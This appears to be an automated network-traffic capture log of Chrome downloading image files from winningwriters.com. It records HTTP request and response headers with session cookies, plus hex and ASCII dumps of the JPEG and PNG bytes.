                                                                                                                                                                                            2024-11-18 20:00:07 UTC1500INData Raw: d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 04 03 03 04 03 03 04 04 03 04 05 04 04 05 06 0a 07 06 06 06 06 0d 09 0a 08 0a 0f 0d 10 10 0f 0d 0f 0e 11 13 18 14 11 12 17 12 0e 0f 15 1c 15 17 19 19 1b 1b 1b 10 14 1d 1f 1d 1a 1f 18 1a 1b 1a ff db 00 43 01 04 05 05 06 05 06 0c 07 07 0c 1a 11 0f 11 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a ff c0 00 11 08 04 38 04 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23
                                                                                                                                                                                            Data Ascii: JFIFCC88"}!1AQa"q2#
                                                                                                                                                                                            2024-11-18 20:00:07 UTC4096INData Raw: ed 25 6f f8 5e d7 c3 b7 3a f1 87 c5 97 97 76 9a 4e d6 c4 f6 c8 19 f7 67 e5 c8 23 a6 33 5e d1 e1 4f 84 5f 0b 7c 69 7b f6 3d 03 c5 fa 94 d7 5b 4b 08 5c 2a 39 03 ae 32 9c fe 15 c9 43 05 53 11 a4 1a bf 6b a4 cf 57 19 9a d1 c0 eb 56 32 b5 af 75 16 d7 de 8f 9e 29 79 af af bf e1 92 7c 32 a0 97 d6 75 52 3f de 8f ff 00 88 af 36 d7 7c 0d f0 77 46 5b 98 7f e1 31 d4 a7 bb 89 58 04 88 07 f9 c7 6c 88 f1 d7 de ba ea 65 38 8a 2a f5 1a 5e ad 1e 65 0e 26 c1 62 a5 cb 49 4a 4f ca 2d 9e 13 4b 5d 3f 82 ac fc 29 79 aa 4f 1f 8d f5 0b eb 0b 10 9f ba 92 d6 35 62 5b 3f c5 90 70 31 e8 2b e8 1f 0e fe ce 7e 01 f1 86 97 1e a5 e1 cf 11 6a 77 76 8e 4a ef 0d 18 c1 1d 41 05 32 0d 73 61 b0 15 71 4b f7 6d 5f b5 f5 3b 71 f9 d6 1b 2e 76 ac a4 97 7e 57 6f bc f9 5b a5 15 f4 bf 88 be 06 fc 32 f0
                                                                                                                                                                                            Data Ascii: %o^:vNg#3^O_|i{=[K\*92CSkWV2u)y|2uR?6|wF[1Xle8*^e&bIJO-K]?)yO5b[?p1+~jwvJA2saqKm_;q.v~Wo[2
                                                                                                                                                                                            2024-11-18 20:00:08 UTC4096INData Raw: 97 ff 00 47 c1 5f 64 7f 66 59 7f cf 9d bf fd fa 5f f0 a9 21 b3 b7 b7 62 d0 5b c5 13 11 82 51 02 9c 7e 15 e9 43 09 c9 25 2e 6d 8e 59 56 e6 8d ac 7e 72 fc 57 ff 00 92 9d e3 0f fb 0c 5d 7f e8 d6 af 40 fd 94 bf e4 a9 9f fb 06 4f fc d2 bc ff 00 e2 bf fc 94 ef 18 7f d8 62 eb ff 00 46 b5 7a 07 ec a5 ff 00 25 4c ff 00 d8 32 7f e6 95 c5 4f f8 eb d4 e8 97 f0 fe 47 a4 fe d8 bf f2 02 f0 b7 fd 7d cf ff 00 a0 2d 7c 8d 5f 5c fe d8 bf f2 02 f0 b7 fd 7d cf ff 00 a0 2d 7c 8d 4f 15 fc 56 2a 3f 02 3e a4 fd 95 fe 29 f9 6e de 07 d6 e6 f9 58 b4 ba 53 b9 e8 7a bc 3f 8f 2c 3f e0 43 b8 af ab 2b f2 da ca f6 e3 4e bc b7 bc b0 99 ed ee ad e4 59 61 95 0e 19 1d 4e 41 07 d4 11 5f a1 bf 08 fe 23 5b fc 4b f0 7d b6 a6 a5 13 51 87 10 ea 10 2f f0 4c 07 24 0f ee b7 de 1f 5c 75 06 bb 30 95 b9
                                                                                                                                                                                            Data Ascii: G_dfY_!b[Q~C%.mYV~rW]@ObFz%L2OG}-|_\}-|OV*?>)nXSz?,?C+NYaNA_#[K}Q/L$\u0
                                                                                                                                                                                            2024-11-18 20:00:08 UTC4096INData Raw: f5 d3 a9 07 42 4a 71 14 24 aa 45 a6 7e 97 eb 17 11 5d 78 6a fe 7b 69 16 68 25 b1 91 e3 91 0e 55 94 c6 48 20 f7 04 57 e6 25 7d 51 fb 3c fc 52 fe d1 f0 a6 ab e0 9d 6e 6c dd 5a 58 cf 26 98 ee 79 92 20 84 b4 5f 55 ea 3f d9 cf 65 af 95 ea f1 35 15 48 c6 48 54 a2 e0 da 67 d6 3f b1 bf fc 83 fc 5d ff 00 5d ad 7f f4 19 2b c7 bf 68 7d 59 f5 6f 8b be 21 2c c4 c7 6a f1 db 46 09 fb a1 23 50 7f f1 ed c7 f1 af 61 fd 8d ff 00 e4 1f e2 ef fa ed 6b ff 00 a0 c9 5e 17 f1 ae 16 83 e2 bf 8b 12 4c e4 df bb f3 e8 c0 30 fd 08 a2 a3 ff 00 67 88 47 f8 8c a9 f0 9f c2 d1 78 cf e2 27 87 f4 6b a5 df 6b 3d ce fb 85 fe f4 51 a9 77 5f c5 54 8f c6 bf 47 51 16 35 54 45 0a aa 30 00 18 00 7a 57 c0 ff 00 b3 75 d4 76 bf 18 74 1f 38 85 12 ad c4 6a 4f f7 8c 2f 8f cf 18 fc 6b ef 9a e9 c1 25 c8 df
                                                                                                                                                                                            Data Ascii: BJq$E~]xj{ih%UH W%}Q<RnlZX&y _U?e5HHTg?]]+h}Yo!,jF#Pak^L0gGx'kk=Qw_TGQ5TE0zWuvt8jO/k%
                                                                                                                                                                                            2024-11-18 20:00:08 UTC4044INData Raw: 3f fa 35 ab de bf 63 bf f9 18 7c 4f ff 00 5e 51 7f e8 66 be 73 d4 6f a5 d5 35 0b bb eb 9d be 7d d4 cf 34 9b 46 06 e6 62 4e 07 a6 4d 7d 19 fb 1d ff 00 c8 c3 e2 7f fa f2 8b ff 00 43 35 e6 e1 f5 ac 8e aa 9f c3 67 d7 74 51 45 7b a7 9e 15 f3 ef ed 7b ff 00 24 fb 47 ff 00 b0 ca 7f e8 99 ab e8 2a f9 f7 f6 bd ff 00 92 7d a3 ff 00 d8 65 3f f4 4c d5 cf 88 fe 1c 8d 69 fc 68 f8 c6 be 97 f0 af ec a3 07 89 7c 31 a3 6b 2d e2 a9 2d 8e a3 63 0d d1 88 69 c1 bc bd e8 1b 6e 7c c1 9c 67 19 c0 af 9a 2b f4 8f e1 6f fc 93 4f 07 7f d8 16 cf ff 00 44 ad 79 d8 5a 71 a9 26 a4 8e aa d2 71 4a c7 85 af ec 6f 6a 0f cf e3 09 88 f4 1a 68 1f fb 52 ba bf 0e 7e ca 5e 0b d2 26 49 f5 89 af f5 d7 53 9f 2e 69 04 51 1f f8 0a 00 7f 36 c5 7b b5 15 e8 ac 3d 25 f6 4e 57 56 6f a9 5b 4f d3 ad 34 9b 38
                                                                                                                                                                                            Data Ascii: ?5c|O^Qfso5}4FbNM}C5gtQE{{$G*}e?Lih|1k--cin|g+oODyZq&qJojhR~^&IS.iQ6{=%NWVo[O48
                                                                                                                                                                                            2024-11-18 20:00:08 UTC4096INData Raw: d5 4f 19 cf 15 eb 54 57 35 3c 34 29 cb 99 33 69 55 94 d5 99 5b 50 b0 b7 d5 2c 2e ac 6f e2 59 ad 6e a2 68 66 8d ba 3a 30 20 8f c4 1a f8 77 51 fd 99 3c 7f 0e bb 73 6b a6 e9 2b 71 a6 2d cb 24 17 ad 7b 02 86 8b 76 04 85 4b ee 1c 72 46 33 5f 75 d1 57 56 8c 6b 5b 9b a1 30 a8 e1 b1 93 e1 8f 0f da 78 53 c3 fa 6e 8b a6 2e db 5b 08 16 14 38 c1 6c 0e 58 fb 93 92 7d c9 ae 53 e3 6f 86 b5 4f 17 fc 33 d6 b4 7f 0e da fd b3 52 b9 30 79 50 f9 89 1e ed b3 c6 cd f3 31 00 7c aa 4f 27 b5 7a 0d 15 ab 8a 71 e5 e8 42 6d 3b 9f 01 ff 00 c3 37 fc 4e ff 00 a1 67 ff 00 2a 36 bf fc 76 be ca f8 51 a1 df f8 6b e1 df 87 f4 9d 6e 0f b2 ea 16 96 db 27 8b 7a be d6 dc 4e 32 a4 83 d7 b1 ae ca 8a c2 96 1e 34 dd e2 69 3a 8e 6a cc f8 7f c6 9f 00 3e 22 ea de 31 f1 0e a1 a7 f8 77 ce b4 bb d4 ee 67
                                                                                                                                                                                            Data Ascii: OTW5<4)3iU[P,.oYnhf:0 wQ<sk+q-${vKrF3_uWVk[0xSn.[8lX}SoO3R0yP1|O'zqBm;7Ng*6vQkn'zN24i:j>"1wg
                                                                                                                                                                                            2024-11-18 20:00:08 UTC4096INData Raw: 28 a7 15 dc f4 ff 00 04 fc 6a f0 87 8f f5 67 d2 bc 3d 7d 2b 5f 08 8c ab 1c f0 34 5b d4 63 3b 73 d4 8c e7 1e 99 3d 8d 7a 15 7e 60 68 1a e5 f7 86 75 9b 1d 5f 47 98 c1 7d 65 28 96 17 1e a3 b1 1d c1 19 04 77 04 8a fd 18 f8 7d e3 6b 1f 88 3e 14 b1 d7 74 d2 14 4e bb 67 87 39 30 cc 3e fa 1f a1 e9 ea 08 3d eb 5c 3d 7f 6b 75 2d c8 ab 4f 93 55 b1 91 e3 af 8c 5e 16 f8 75 a9 db e9 de 26 b8 b9 86 e6 78 04 e8 22 b7 69 01 42 c5 7a 8f 75 35 b3 e0 8f 1d 68 df 10 b4 89 35 5f 0d 4b 2c b6 71 ce d6 ec d2 c4 63 3b c2 a9 3c 1f 66 15 f2 cf ed 7d ff 00 23 ee 8b ff 00 60 75 ff 00 d1 d2 d7 65 f0 0b 5e 93 c2 df 00 7c 57 ac c0 a1 e6 b0 bb bb 9a 25 23 82 e2 08 b6 e7 db 38 a4 ab cb da b8 3d 90 dd 35 c8 a4 b7 3d 7f c7 3f 17 fc 23 f0 f5 fc 8f 10 ea 63 ed c5 43 0b 3b 74 32 cd 83 d0 90 38
                                                                                                                                                                                            Data Ascii: (jg=}+_4[c;s=z~`hu_G}e(w}k>tNg90>=\=ku-OU^u&x"iBzu5h5_K,qc;<f}#`ue^|W%#8=5=?#cC;t28
                                                                                                                                                                                            2024-11-18 20:00:08 UTC4096INData Raw: 2f 7f 35 c1 d5 b5 e9 53 61 ba 68 f6 24 2a 7a ac 6b ce 33 dd 89 c9 f6 19 15 6e 15 71 13 4e 4a c9 12 a5 0a 71 76 77 3e 48 f8 e1 aa cb ab fc 57 f1 4c d3 b1 63 0d eb 5b 28 f4 58 80 8c 0f fc 76 be ca f8 15 e1 bb 6f 0d 7c 2d f0 f2 5a c6 ab 25 f5 aa 5f dc 38 1c bb ca a1 f2 7e 8a 55 7e 8a 2b e4 1f 8f fa 04 da 07 c5 7f 10 2c a8 44 57 b2 8b d8 58 8e 1d 64 19 24 7d 1b 70 fc 2b ea af d9 db c6 f6 9e 2b f8 73 a6 d9 24 cb fd a5 a3 42 b6 77 30 e7 e6 55 51 88 db 1e 85 40 e7 d4 11 da 8c 3d 95 79 5f 70 ab fc 35 63 d6 ab ce fe 39 f8 6e db c4 bf 0b bc 45 1d d4 6a d2 59 5a 3d f5 bb 91 ca 49 12 97 c8 fa 80 cb f4 63 5e 89 5e 4d fb 43 f8 de d3 c2 7f 0e 75 3b 37 99 7f b4 75 98 5e ca da 1c fc cc ae 31 23 63 d0 21 3c fa 90 3b d7 a1 55 a5 07 73 9e 17 e6 56 3e 47 f8 23 aa cb a4 7c 56
                                                                                                                                                                                            Data Ascii: /5Sah$*zk3nqNJqvw>HWLc[(Xvo|-Z%_8~U~+,DWXd$}p++s$Bw0UQ@=y_p5c9nEjYZ=Ic^^MCu;7u^1#c!<;UsV>G#|V
                                                                                                                                                                                            2024-11-18 20:00:08 UTC4096INData Raw: 56 a6 86 3b 88 64 86 e2 34 96 19 14 a3 a3 a8 65 65 23 04 10 7a 82 2a e1 0e 58 28 8a 52 bc ae 7e 5f 69 1a 9c fa 26 ab 63 a9 d8 95 17 56 37 11 dc 42 58 64 6f 46 0c b9 1d c6 40 af 5f ff 00 86 a8 f8 83 ff 00 3d b4 df fc 02 1f e3 5f 5d ff 00 c2 b1 f0 47 fd 09 de 1d ff 00 c1 4c 1f fc 4d 1f f0 ac 7c 11 ff 00 42 77 87 7f f0 53 07 ff 00 13 5c 31 c2 d5 87 c3 2b 1b ba d0 96 e8 f9 15 7f 6a 7f 88 25 80 33 69 bc 9f f9 f2 1f e3 5f 72 57 2b ff 00 0a cb c1 03 a7 83 bc 3d ff 00 82 98 3f f8 9a ea ab aa 8c 27 0b f3 ca e6 33 94 65 b2 b0 57 83 7e d5 5e 33 fe c2 f0 34 3a 15 ac 9b 6e f5 c9 76 38 07 91 04 78 67 fc db 60 f7 05 ab de 6b 1b 58 f0 8f 87 fc 43 34 73 eb fa 16 97 aa cd 1a ec 49 2f 2c a3 99 95 73 9c 02 c0 90 33 da b4 a9 17 38 38 ae a4 c5 a8 ca ec f8 eb f6 66 f8 71 65 e3
                                                                                                                                                                                            Data Ascii: V;d4ee#z*X(R~_i&cV7BXdoF@_=_]GLM|BwS\1+j%3i_rW+=?'3eW~^34:nv8xg`kXC4sI/,s388fqe


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            38192.168.2.164975666.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC647OUTGET /assets/images/social-sprite-2020.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:08 UTC369INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Tue, 09 Mar 2021 17:09:44 GMT
                                                                                                                                                                                            ETag: "1092-5bd1d9de0a600"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 4242
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:08 UTC4242INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 96 00 00 00 16 08 06 00 00 00 22 b1 65 3a 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 23 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 36 30 2c 20 32 30 32 30 2f 30 35 2f 31 32 2d 31 36 3a 30 34 3a 31 37 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDR"e:tEXtSoftwareAdobe ImageReadyqe<#iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            39192.168.2.164975866.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC646OUTGET /graphics/home_page_slide_victor.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:08 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Thu, 15 Feb 2024 15:10:16 GMT
                                                                                                                                                                                            ETag: "1ab8e-6116d065b93bb"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 109454
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:08 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 5a 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 66 33 35 34 65 66 63 37 30 2c 20 32 30 32 33 2f 31 31 2f 30 39 2d 31 32 3a 30 35 3a 35 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*DuckyZhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.f354efc70, 2023/11/09-12:05:53 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 28 09 4a 50 14 09 09 48 90 18 08 0b 74 8e 13 18 72 f6 c0 37 89 e1 3f eb 80 3a 71 e0 38 98 06 cb 0e 67 97 b6 50 0e cb 86 72 9e 50 07 b8 ce 79 65 ed 80 07 c3 90 c7 32 30 10 00 4c 03 2c 75 1c bb b0 80 24 4c 93 ff 00 47 8f ba 01 61 81 32 c3 1e 59 f7 c0 09 93 e1 09 c7 9c b0 f7 40 12 09 e1 2c 71 80 00 4e 7c b8 fe 98 40 1d 39 f3 c2 01 70 00 09 48 c0 45 fd 67 97 fa 6d ba 3b 11 49 23 fe f3 a5 80 d0 69 48 c0 29 fb 46 13 80 20 99 76 1c fe a8 05 ac 8c 39 40 2d 66 00 49 53 d5 2e d8 07 f8 86 20 62 73 80 1a c8 32 56 1c e0 1d ad 3c e0 1a 32 4c b1 22 78 40 2d 4a 9c a5 8c 03 81 38 ea 12 94 00 c0 85 63 e1 3c 60 1a 34 8f 84 cc f0 10 0e d4 47 c5 87 28 05 20 a3 d9 c2 00 11 a6 52 c4 98 07 14 02 67 00 25 a4 12 33 80 53 5f 28 02 35 71 12 e5 00 4e 00 98 0a 45 64 89 40 48 d3 6f fd
                                                                                                                                                                                            Data Ascii: (JPHtr7?:q8gPrPye20L,u$LGa2Y@,qN|@9pHEgm;I#iH)F v9@-fIS. bs2V<2L"x@-J8c<`4G( Rg%3S_(5qNEd@Ho
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 52 58 49 09 c1 2e 1d 44 cb 86 02 03 21 f5 17 bd 1a a5 b2 d0 74 de 9d 5a 58 b8 6a a9 b9 d4 26 53 6d 0d ba 0b 4d 24 4b 8e 90 4c b2 ca 03 55 ee 34 ec 54 d8 ed f5 4e fd d3 de 57 95 5b 54 0a 43 80 17 d4 a0 a4 83 30 09 4f eb 80 c2 1f a5 b9 dd ab e8 28 ac 7a 15 f3 32 f3 1a 70 fd c2 18 42 81 d4 a0 7b 64 25 01 92 b1 6b 75 c1 47 45 5d 78 f9 9a 94 17 d5 f7 c4 eb 5a 8a ca 94 a2 4c 88 92 44 91 21 20 98 09 03 6a 58 99 55 11 a9 71 c4 b6 14 a2 dd ba 99 dd 29 f9 87 65 a9 4e 2d 60 ea 22 46 49 07 01 c2 02 7d d9 fb 4d a6 2e 74 d5 40 fc dd 5b 69 5a 94 d2 d6 b4 a3 50 18 b4 92 a2 50 48 18 6a 57 b2 03 65 a9 6d 77 0a b4 5b d1 52 f3 ed 52 2d 6a 7d 8a 55 b6 94 2c 36 c1 01 47 0c 0a 34 ca 4a 24 02 25 01 24 2e c4 29 ad a8 a5 65 b5 bc f5 c7 49 a7 64 a9 4a 65 0a 74 95 02 ac 53 a4 14 82
                                                                                                                                                                                            Data Ascii: RXI.D!tZXj&SmM$KLU4TNW[TC0O(z2pB{d%kuGE]xZLD! jXUq)eN-`"FI}M.t@[iZPPHjWemw[RR-j}U,6G4J$%$.)eIdJetS
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: bf e5 d2 52 9f 31 20 17 9c 5b 84 12 14 a2 34 24 0e c9 67 01 91 54 d6 a6 96 d6 87 29 6a c3 4d 5b d6 95 52 50 be d7 90 ad 29 3a 9c 5a 54 42 be 30 4c d4 4c fb a0 32 4b 2d d6 c1 54 db ad 25 87 18 6e b5 08 5b ee f9 6a 59 d2 b5 c9 24 29 ad 47 4a d2 08 49 38 ce 7d 90 19 cd 3d 0f ce dc 19 79 aa b6 93 6d a6 9b cd 5b 82 93 e2 43 4d e9 6c 89 a9 27 52 09 91 96 12 cf 18 09 36 c1 64 72 9d 56 d7 de 08 6a be e6 85 16 da 4a 90 1b f3 16 3c 3a 74 93 90 03 3c 86 78 e3 01 91 37 6e 34 d5 0d d2 fe 32 95 55 a1 45 0e 3e a5 b6 52 8f 2c 80 a1 89 1e 22 af b4 70 f6 40 64 0b a1 35 b4 a5 ba 6a c4 d5 2d 0a f1 3c 1d 69 d0 87 4f 88 0d 4d 92 67 c3 1c 66 65 01 8d ff 00 23 5f 56 2e 55 b4 4f b4 a7 dd 20 50 14 3e 5c 69 b0 84 8f 16 a6 bc 5a e7 e1 52 72 1c 44 05 7b 65 9e fd 6f a5 ab ab bc b1 e5
                                                                                                                                                                                            Data Ascii: R1 [4$gT)jM[RP):ZTB0LL2K-T%n[jY$)GJI8}=ym[CMl'R6drVjJ<:t<x7n42UE>R,"p@d5j-<iOMgfe#_V.UO P>\iZRrD{eo
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: ec f7 58 64 79 9e 4d ea c9 65 be 59 9b a5 57 c2 d2 d7 47 50 cb 8c ba 84 28 79 80 29 c2 95 9c c4 ce 01 b6 5d 3f f5 e7 e9 b3 73 d3 52 6d eb ef 57 6a 9d 7a 9d a6 91 43 53 b8 16 8b 45 62 2a 5a 51 52 9b 15 14 2d d3 91 42 a5 28 2a 52 2f b7 88 29 71 22 6a 09 bf 66 f5 3f a6 b7 9a 5b 7d 8a d5 6e 16 da fa 5a 97 6e 16 4a c6 6f 14 ae 5b 2b 98 b8 a9 26 b1 8a 3a ca 25 a9 3e 7a 16 84 bf 4c f3 88 6c b8 0a d2 bc 4a 44 06 ee ed 1d f6 2d 15 9f 2f 4d 7a ab 0f 6d c9 ae 81 fb a2 03 0e b4 29 66 a4 39 42 f3 53 48 66 a1 04 a2 a5 82 56 d4 e4 b4 c8 12 12 13 60 bd 5b a8 ef d6 a6 d8 bd 8a db 4a 5e 75 ca 17 c0 0d be b4 38 a4 ac 6a 2c 13 a7 cb 52 b4 24 8c 15 29 0c 0c 04 d7 b6 ee bf 8d 79 46 dc b5 14 af c3 4e f9 73 cc 0f b8 b7 49 50 5e 7a 48 d0 70 02 44 11 01 31 ee 2d c2 c6 d4 db 34 d4
                                                                                                                                                                                            Data Ascii: XdyMeYWGP(y)]?sRmWjzCSEb*ZQR-B(*R/)q"jf?[}nZnJo[+&:%>zLlJD-/Mzm)f9BSHfV`[J^u8j,R$)yFNsIP^zHpD1-4
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: d9 3c 20 0e b4 f3 80 0a 20 a4 c8 c0 53 12 80 22 53 38 40 09 c0 11 df 38 03 29 e3 c3 94 04 65 d6 3c 3a 6b ba 8e 52 69 9f fe 94 d4 a0 39 ea a7 47 9b 88 c8 82 71 cf 10 78 40 64 8d 3b 36 f1 3a 94 0a b1 ef 18 4b b3 ba 02 ad 3b 84 68 90 91 51 90 13 00 4b 2e 30 1e b7 d5 96 18 9f 09 94 81 c7 b0 81 98 39 c0 61 9b 7d a5 2b 7c dc 12 47 80 37 30 4e 59 c8 fd 59 c0 6b e7 5c f7 0b 0e 57 2a cd 4f 27 17 50 ad 0d 4c 4e 7a 8c b9 c0 48 3d 3a a0 76 d1 b6 5b 55 c9 67 c9 6c 00 92 01 4e a5 cb ee d2 92 9e 67 02 20 2c 9b 95 84 37 4f 50 fb 89 6d 08 49 69 0e 2c 62 7c c7 dc fb c9 eb c8 4c 88 0f 4e cf b2 dc 5f b2 f5 8a 94 b2 ba aa 9b 15 f3 66 ee 76 69 19 33 7d 76 7b fd b2 ab 6b bc e4 9c 33 08 45 5d 13 69 56 39 11 01 21 b3 6f b7 5e 29 aa ad f7 1a 77 dc a3 4e 54 94 45 6f 3a b0 a6 fc b2
                                                                                                                                                                                            Data Ascii: < S"S8@8)e<:kRi9Gqx@d;6:K;hQK.09a}+|G70NYYk\W*O'PLNzH=:v[UglNg ,7OPmIi,b|LN_fvi3}v{k3E]iV9!o^)wNTEo:
